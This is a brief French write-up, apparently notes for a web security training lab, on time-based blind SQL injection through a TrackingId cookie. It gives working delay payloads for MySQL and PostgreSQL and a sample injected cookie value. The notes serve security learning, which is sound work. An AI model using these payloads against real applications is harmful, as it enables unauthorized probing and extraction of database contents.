Injection SQL aveugle par délais (time-based)

Blind SQL injection with time delays

Lab: Blind SQL injection with time delays | Web Security AcademyWebSecAcademy

Contexte : la valeur du cookie TrackingId est insérée dans une requête SQL exécutée synchronement. La réponse HTTP n’indique pas directement le résultat de la requête, mais on peut provoquer des délai conditionnels (sleep) pour déduire des informations (time-based blind SQLi).

MySQL :

' AND SLEEP(10)-- -

PostgreSQL :

' || pg_sleep(10)-- -

Exemple concret (cookie) : TrackingId=abc123' AND SLEEP(10)-- - (MySQL)

Mis à jour il y a 5 mois

hashtagBlind SQL injection with time delays

hashtagPayloads fournis (à placer après la partie légitime du cookie, p.ex. TrackingId=<BASE>' <PAYLOAD> -- -)

Blind SQL injection with time delays

Payloads fournis (à placer après la partie légitime du cookie, p.ex. `TrackingId=<BASE>' <PAYLOAD> -- -`)